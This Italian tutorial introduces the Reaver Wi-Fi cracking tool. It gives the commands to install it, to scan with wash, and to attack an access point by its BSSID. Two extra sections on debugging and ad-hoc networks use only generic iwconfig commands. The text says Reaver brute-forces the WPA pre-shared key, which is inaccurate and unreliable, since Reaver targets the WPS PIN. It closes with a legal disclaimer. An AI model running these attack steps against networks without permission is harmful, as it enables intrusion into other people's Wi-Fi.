Reaver è un tool open source che viene usato per craccare le password WPA/WPA2, in pratica funziona attaccando la protezione pre-shared key (PSK) implementata da questi protocolli tentando di recuperare la password tramite brute force.
Inoltre in seguito abbiamo anche altre applicazioni.
Installazione:
- Comando:
sudo apt install reaver
Dipendenze:
- aircrack-ng
- libc6
- libpcap0.8
- pixiewps
Esempi utili:
Ora vediamo un po' di esempi dove si può usare questo tool relativamente potente. Iniziamo con il suo obbiettivo base cioè craccare la password di un ipotetica rete:
- Dopo aver aperto il terminale come "root" verifica che l'interfaccia di rete sia configurata bene:
iwconfig
- Avvia l'interfaccia:
ifconfig wlan0 up
- Eseguiamo una scansione per trovare la rete desiderata:
wash -i wlan0
- Attacchiamo la rete desiderata:
reaver -i wlan0 -b <BSSID> -vv
Ovviamente dovrete sostituire <BSSID> con l'indirizzo MAC dell'access point.
Vediamo ora un semplice esempio di debugging di rete:
- Esegui i passaggi preliminari di prima.
- Attiva l'interfaccia wirless:
ifconfig wlan0 up
- Esegui una scansione per trovare la rete:
iwlist wlan0 scan
- Verifica se la password è corretta:
iwconfig wlan0 essid <SSID> key <password>
Come prima al posto di <SSID> bisogna scrivere il nome della rete wireless, stesso discorso per <password>. - Verifica che la connessione sia stabilita in modo corretto:
iwconfig wlan0
Ovviamente è tutto molto semplice ma se ad esempio la rete non viene visualizzata durante la scansione sappiamo che è necessario modificare la configurazione dell'interfaccia wireless.
Creare una rete ad hoc:
- Sempre passaggi preliminari.
- Attiva l'interfaccia di rete:
ifconfig wlan0 up
- Crea la vera e propria rete:
iwconfig wlan0 mode ad-hoc
- Rinomina la rete:
iwconfig wlan0 essid <SSID>
- Assegna un IP:
ifconfig wlan0 <IP address>
- Verifica:
iwconfig wlan0
Conclusioni:
Inutile ribadire che questo tool deve essere utilizzato solo per scopi di testing o didattici. Violare una rete altrui senza alcun permesso è illegale!